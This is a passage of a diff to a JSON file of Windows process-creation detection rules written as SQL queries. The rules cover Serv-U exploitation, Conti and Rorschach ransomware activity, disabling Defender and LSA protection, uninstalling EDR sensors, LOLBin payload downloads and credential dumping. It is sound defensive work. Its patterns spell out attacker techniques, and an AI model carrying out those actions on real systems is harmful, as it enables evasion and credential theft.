"2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine 